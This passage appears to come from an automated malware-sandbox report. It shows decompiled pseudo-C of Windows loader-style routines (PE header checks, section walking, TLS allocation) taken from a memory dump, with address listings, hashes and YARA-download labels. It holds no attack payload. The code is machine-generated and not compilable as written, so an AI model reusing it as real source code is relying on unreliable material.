																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L036DEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03709730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E036DE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L036D8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03703C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                      0x036dd5f2
                                      0x036dd5f5
                                      0x036dd5f5
                                      0x036dd5fd
                                      0x036dd600
                                      0x036dd60a
                                      0x036dd60d
                                      0x036dd617
                                      0x036dd61d
                                      0x036dd627
                                      0x036dd62e
                                      0x036dd911
                                      0x036dd913
                                      0x00000000
                                      0x036dd919
                                      0x036dd919
                                      0x036dd919
                                      0x036dd634
                                      0x036dd634
                                      0x036dd634
                                      0x036dd634
                                      0x036dd640
                                      0x036dd8bf
                                      0x00000000
                                      0x036dd646
                                      0x036dd646
                                      0x036dd64d
                                      0x036dd652
                                      0x0372b2fc
                                      0x0372b2fc
                                      0x0372b302
                                      0x0372b33b
                                      0x0372b341
                                      0x00000000
                                      0x0372b304
                                      0x0372b304
                                      0x0372b319
                                      0x0372b31e
                                      0x0372b324
                                      0x0372b326
                                      0x0372b332
                                      0x0372b347
                                      0x0372b34c
                                      0x0372b351
                                      0x0372b35a
                                      0x00000000
                                      0x0372b328
                                      0x0372b328
                                      0x00000000
                                      0x0372b328
                                      0x0372b326
                                      0x036dd658
                                      0x036dd658
                                      0x036dd65b
                                      0x036dd665
                                      0x00000000
                                      0x036dd66b
                                      0x036dd66b
                                      0x036dd66b
                                      0x036dd66b
                                      0x036dd66d
                                      0x036dd672
                                      0x036dd67a
                                      0x00000000
                                      0x00000000
                                      0x036dd680
                                      0x036dd686
                                      0x036dd8ce
                                      0x036dd8d4
                                      0x036dd8dd
                                      0x036dd8e0
                                      0x036dd68c
                                      0x036dd691
                                      0x036dd69d
                                      0x036dd6a2
                                      0x036dd6a7
                                      0x036dd6b0
                                      0x036dd6b5
                                      0x036dd6e0
                                      0x036dd6b7
                                      0x036dd6b7
                                      0x036dd6b9
                                      0x036dd6b9
                                      0x036dd6bb
                                      0x036dd6bd
                                      0x036dd6ce
                                      0x036dd6d0
                                      0x036dd6d2
                                      0x0372b363
                                      0x0372b365
                                      0x00000000
                                      0x0372b36b
                                      0x00000000
                                      0x0372b36b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036dd6bf
                                      0x036dd6bf
                                      0x036dd6e5
                                      0x036dd6e7
                                      0x036dd6e9
                                      0x036dd6ec
                                      0x036dd6ec
                                      0x036dd6ef
                                      0x036dd6f5
                                      0x036dd6f9
                                      0x036dd6fb
                                      0x036dd6fd
                                      0x036dd701
                                      0x036dd703
                                      0x036dd70a
                                      0x036dd70a
                                      0x036dd701
                                      0x036dd710
                                      0x036dd710
                                      0x036dd6c1
                                      0x036dd6c1
                                      0x036dd6c6
                                      0x0372b36d
                                      0x0372b36f
                                      0x00000000
                                      0x0372b375
                                      0x0372b375
                                      0x0372b375
                                      0x00000000
                                      0x0372b375
                                      0x00000000
                                      0x036dd6cc
                                      0x036dd6d8
                                      0x036dd6d8
                                      0x036dd6d8
                                      0x00000000
                                      0x036dd6c6
                                      0x036dd6bf
                                      0x00000000
                                      0x036dd6da
                                      0x036dd6da
                                      0x036dd716
                                      0x036dd71b
                                      0x036dd720
                                      0x036dd726
                                      0x036dd726
                                      0x036dd72d
                                      0x00000000
                                      0x036dd733
                                      0x036dd739
                                      0x036dd742
                                      0x036dd750
                                      0x036dd758
                                      0x036dd764
                                      0x036dd776
                                      0x036dd77a
                                      0x036dd783
                                      0x036dd928
                                      0x036dd92c
                                      0x036dd93d
                                      0x036dd944
                                      0x036dd94f
                                      0x036dd954
                                      0x036dd956
                                      0x036dd95f
                                      0x036dd961
                                      0x036dd973
                                      0x036dd973
                                      0x036dd956
                                      0x036dd944
                                      0x036dd92c
                                      0x036dd78b
                                      0x0372b394
                                      0x036dd791
                                      0x036dd798
                                      0x0372b3a3
                                      0x0372b3bb
                                      0x0372b3bb
                                      0x036dd7a5
                                      0x036dd866
                                      0x036dd870
                                      0x036dd884
                                      0x036dd892
                                      0x036dd898
                                      0x036dd89e
                                      0x036dd8a0
                                      0x036dd8a6
                                      0x036dd8ac
                                      0x036dd8ae
                                      0x036dd8b4
                                      0x036dd8b4
                                      0x036dd8ae
                                      0x036dd7a5
                                      0x036dd78b
                                      0x036dd7b1
                                      0x0372b3c5
                                      0x0372b3c5
                                      0x036dd7c3
                                      0x036dd7ca
                                      0x036dd7e5
                                      0x036dd7eb
                                      0x036dd8eb
                                      0x036dd8ed
                                      0x00000000
                                      0x036dd8f3
                                      0x036dd8f3
                                      0x036dd8f3
                                      0x00000000
                                      0x036dd8ed
                                      0x036dd7cc
                                      0x036dd7cc
                                      0x036dd7d2
                                      0x00000000
                                      0x036dd7d4
                                      0x036dd7d4
                                      0x036dd7d7
                                      0x036dd7df
                                      0x0372b3d4
                                      0x0372b3d9
                                      0x0372b3dc
                                      0x0372b3dc
                                      0x0372b3df
                                      0x0372b3e2
                                      0x0372b468
                                      0x0372b46d
                                      0x0372b46f
                                      0x0372b46f
                                      0x0372b475
                                      0x036dd8f8
                                      0x036dd8f9
                                      0x036dd8fd
                                      0x0372b3e8
                                      0x0372b3e8
                                      0x0372b3eb
                                      0x0372b3ed
                                      0x00000000
                                      0x0372b3ef
                                      0x0372b3ef
                                      0x0372b3f1
                                      0x0372b3f4
                                      0x0372b3fe
                                      0x0372b404
                                      0x0372b409
                                      0x0372b40e
                                      0x0372b410
                                      0x0372b410
                                      0x0372b414
                                      0x0372b414
                                      0x0372b41b
                                      0x0372b420
                                      0x0372b423
                                      0x0372b425
                                      0x0372b427
                                      0x0372b42a
                                      0x0372b42d
                                      0x0372b42d
                                      0x0372b42a
                                      0x0372b432
                                      0x0372b436
                                      0x0372b438
                                      0x0372b43b
                                      0x0372b43b
                                      0x0372b449
                                      0x0372b44e
                                      0x0372b454
                                      0x0372b458
                                      0x0372b458
                                      0x0372b45d
                                      0x00000000
                                      0x0372b45d
                                      0x0372b3ed
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036dd7df
                                      0x036dd7d2
                                      0x036dd7ca
                                      0x0372b37c
                                      0x0372b37e
                                      0x0372b385
                                      0x0372b38a
                                      0x00000000
                                      0x0372b38a
                                      0x036dd742
                                      0x036dd7f1
                                      0x036dd7f8
                                      0x0372b49b
                                      0x0372b49b
                                      0x036dd800
                                      0x036dd837
                                      0x036dd843
                                      0x036dd845
                                      0x036dd847
                                      0x036dd84a
                                      0x036dd84b
                                      0x036dd84e
                                      0x036dd857
                                      0x036dd802
                                      0x036dd802
                                      0x036dd80d
                                      0x00000000
                                      0x036dd818
                                      0x036dd818
                                      0x036dd824
                                      0x036dd831
                                      0x0372b4a5
                                      0x0372b4ab
                                      0x0372b4b3
                                      0x0372b4b8
                                      0x0372b4bb
                                      0x00000000
                                      0x0372b4c1
                                      0x0372b4c1
                                      0x0372b4c8
                                      0x00000000
                                      0x0372b4ce
                                      0x0372b4d4
                                      0x0372b4e1
                                      0x0372b4e3
                                      0x0372b4e5
                                      0x00000000
                                      0x0372b4eb
                                      0x0372b4f0
                                      0x0372b4f2
                                      0x036ddac9
                                      0x036ddacc
                                      0x036ddacf
                                      0x036ddad1
                                      0x036ddd78
                                      0x036ddd78
                                      0x036ddcf2
                                      0x00000000
                                      0x036ddad7
                                      0x036ddad9
                                      0x036ddadb
                                      0x00000000
                                      0x00000000
                                      0x036ddae1
                                      0x036ddae1
                                      0x036ddae4
                                      0x036ddae6
                                      0x0372b4f9
                                      0x0372b4f9
                                      0x0372b500
                                      0x036ddaec
                                      0x036ddaec
                                      0x036ddaf5
                                      0x036ddaf8
                                      0x036ddafb
                                      0x036ddb03
                                      0x036ddb11
                                      0x036ddb16
                                      0x036ddb19
                                      0x036ddb1b
                                      0x0372b52c
                                      0x0372b531
                                      0x0372b534
                                      0x036ddb21
                                      0x036ddb21
                                      0x036ddb24
                                      0x036ddcd9
                                      0x036ddce2
                                      0x036ddce5
                                      0x036ddd6a
                                      0x036ddd6d
                                      0x00000000
                                      0x036ddd73
                                      0x0372b51a
                                      0x0372b51c
                                      0x0372b51f
                                      0x0372b524
                                      0x00000000
                                      0x0372b524
                                      0x036ddce7
                                      0x036ddce7
                                      0x036ddce7
                                      0x00000000
                                      0x036ddce7
                                      0x00000000
                                      0x036ddb2a
                                      0x036ddb2c
                                      0x036ddb31
                                      0x036ddb33
                                      0x036ddb36
                                      0x036ddb39
                                      0x036ddb3b
                                      0x036ddb66
                                      0x036ddb66
                                      0x036ddb3d
                                      0x036ddb3d
                                      0x036ddb3e
                                      0x036ddb46
                                      0x036ddb47
                                      0x036ddb49
                                      0x036ddb4c
                                      0x036ddb53
                                      0x036ddb55
                                      0x036ddb58
                                      0x036ddb5a
                                      0x0372b50a
                                      0x0372b50f
                                      0x0372b512
                                      0x036ddb60
                                      0x036ddb60
                                      0x036ddb63
                                      0x036ddb63
                                      0x00000000
                                      0x036ddb63
                                      0x036ddb5a
                                      0x036ddb3b
                                      0x036ddb24
                                      0x036ddb69
                                      0x036ddb69
                                      0x036ddb6c
                                      0x036ddb6f
                                      0x036ddb74
                                      0x0372b557
                                      0x0372b557
                                      0x0372b55e
                                      0x036ddb7a
                                      0x036ddb7c
                                      0x036ddb7f
                                      0x036ddb82
                                      0x036ddb85
                                      0x00000000
                                      0x036ddb8b
                                      0x036ddb8b
                                      0x036ddb8d
                                      0x036ddb9b
                                      0x036ddb9b
                                      0x036ddb9d
                                      0x036ddba0
                                      0x036ddba2
                                      0x036ddba4
                                      0x036ddba7
                                      0x036ddba9
                                      0x036ddbae
                                      0x036ddbae
                                      0x036ddbb1
                                      0x036ddbb4
                                      0x036ddbb4
                                      0x036ddbb7
                                      0x036ddbba
                                      0x036ddcd2
                                      0x036ddcd4
                                      0x00000000
                                      0x036ddbc0
                                      0x036ddbc0
                                      0x036ddbd2
                                      0x036ddbd7
                                      0x036ddbda
                                      0x036ddbdd
                                      0x036ddbdf
                                      0x00000000
                                      0x036ddbe5
                                      0x036ddbe5
                                      0x036ddbee
                                      0x036ddbf1
                                      0x0372b541
                                      0x0372b544
                                      0x00000000
                                      0x0372b546
                                      0x0372b546
                                      0x00000000
                                      0x0372b546
                                      0x036ddbf7
                                      0x036ddbf7
                                      0x036ddbfd
                                      0x036ddbfd
                                      0x036ddbff
                                      0x036ddc0b
                                      0x036ddc15
                                      0x036ddc1b
                                      0x036ddc1d
                                      0x036ddc21
                                      0x036ddc21
                                      0x036ddc23
                                      0x036ddc23
                                      0x036ddc26
                                      0x036ddc29
                                      0x036ddc2b
                                      0x00000000
                                      0x00000000
                                      0x036ddc31
                                      0x036ddc34
                                      0x036ddc36
                                      0x036ddcbf
                                      0x036ddcbf
                                      0x036ddcc2
                                      0x00000000
                                      0x036ddc3c
                                      0x036ddc41
                                      0x036ddc43
                                      0x00000000
                                      0x036ddc45
                                      0x036ddc45
                                      0x036ddc47
                                      0x00000000
                                      0x036ddc4d
                                      0x036ddc4d
                                      0x036ddc50
                                      0x036ddc52
                                      0x036ddc55
                                      0x036ddcfa
                                      0x036ddcfe
                                      0x036ddd08
                                      0x036ddd0a
                                      0x036ddd0c
                                      0x00000000
                                      0x036ddd12
                                      0x036ddd15
                                      0x036ddd2d
                                      0x036ddd2f
                                      0x036ddd32
                                      0x036ddd35
                                      0x00000000
                                      0x036ddd35
                                      0x036ddc5b
                                      0x036ddc5b
                                      0x036ddc5e
                                      0x036ddc61
                                      0x036ddc64
                                      0x036ddc67
                                      0x036ddc67
                                      0x036ddc6a
                                      0x036ddc6c
                                      0x036ddc8e
                                      0x036ddc8e
                                      0x036ddc91
                                      0x036ddc93
                                      0x036ddcce
                                      0x036ddcce
                                      0x036ddc95
                                      0x036ddc9c
                                      0x036ddc6e
                                      0x036ddc72
                                      0x036ddc75
                                      0x036ddc77
                                      0x036ddc79
                                      0x0372b551
                                      0x0372b551
                                      0x00000000
                                      0x036ddc7f
                                      0x036ddc7f
                                      0x036ddc81
                                      0x00000000
                                      0x036ddc83
                                      0x036ddc86
                                      0x036ddc88
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036ddc88
                                      0x036ddc81
                                      0x036ddc79
                                      0x036ddc6c
                                      0x036ddc55
                                      0x036ddc47
                                      0x036ddc43
                                      0x00000000
                                      0x036ddc36
                                      0x036ddc23
                                      0x00000000
                                      0x036ddbff
                                      0x036ddbf1
                                      0x036ddbdf
                                      0x036ddb8f
                                      0x036ddb92
                                      0x036ddb95
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036ddb95
                                      0x036ddb8d
                                      0x036ddb85
                                      0x036ddb74
                                      0x036ddc9f
                                      0x036ddca2
                                      0x036ddcb0
                                      0x036ddcb0
                                      0x036ddad1
                                      0x0372b4e5
                                      0x0372b4c8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036dd831
                                      0x036dd80d
                                      0x00000000
                                      0x036dd800
                                      0x0372b47f
                                      0x0372b485
                                      0x00000000
                                      0x0372b485
                                      0x036dd665
                                      0x036dd652
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: efc5a8516575dc70b3f166aec382638b30dc9085f18f70793fd22c5f4248c1b1
                                      • Instruction ID: 8609c761d5a6567ea66fed65c88034e1c5e1cdc8796ba13e0152d14324d9466b
                                      • Opcode Fuzzy Hash: efc5a8516575dc70b3f166aec382638b30dc9085f18f70793fd22c5f4248c1b1
                                      • Instruction Fuzzy Hash: DAE1C134E00359CFDB24EF28C984BA9B7B6BF45304F0841E9D9099B391D774A985CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D849B, Relevance: .3, Instructions: 290COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E036D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x379f9c0);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x37b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E036DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E036E2280( *[fs:0x30], 0x37b8550);
						_t139 =  *0x37b7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E036FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E036DFFB0(_t193, _t235, 0x37b8550);
								L5:
								return E0371D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E036C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x37b7b9c; // 0x0
							_t235 = L036E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x37b7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E036FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E036DFFB0(_t193, _t235, 0x37b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L036E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L036E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x37b7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x37b7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E037037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x37b7b9c; // 0x0
									_t214 = L036E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E037037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x37b7b10 =  *0x37b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x37b7b04 =  *0x37b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L036E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L036E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x37b7b08 =  *0x37b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E037057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0370F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L036E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E036FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L036E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E037096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                      0x036d849b
                                      0x036d849b
                                      0x036d849b
                                      0x036d849b
                                      0x036d849d
                                      0x036d84a2
                                      0x036d84a7
                                      0x036d84b1
                                      0x036d84d8
                                      0x00000000
                                      0x036d84b3
                                      0x036d84c4
                                      0x036d84c9
                                      0x036d84cd
                                      0x036d84cf
                                      0x036d84cf
                                      0x036d84d6
                                      0x036d84e6
                                      0x036d84e9
                                      0x036d84ec
                                      0x036d84ef
                                      0x036d84f2
                                      0x036d84f4
                                      0x036d84fc
                                      0x036d8501
                                      0x036d8506
                                      0x036d8509
                                      0x036d86e0
                                      0x036d86e5
                                      0x036d86e8
                                      0x036d86ed
                                      0x036d86f0
                                      0x036d86f2
                                      0x03729afd
                                      0x03729b02
                                      0x036d84da
                                      0x036d84df
                                      0x036d84df
                                      0x036d86fa
                                      0x036d86fd
                                      0x036d86fe
                                      0x036d8701
                                      0x036d8706
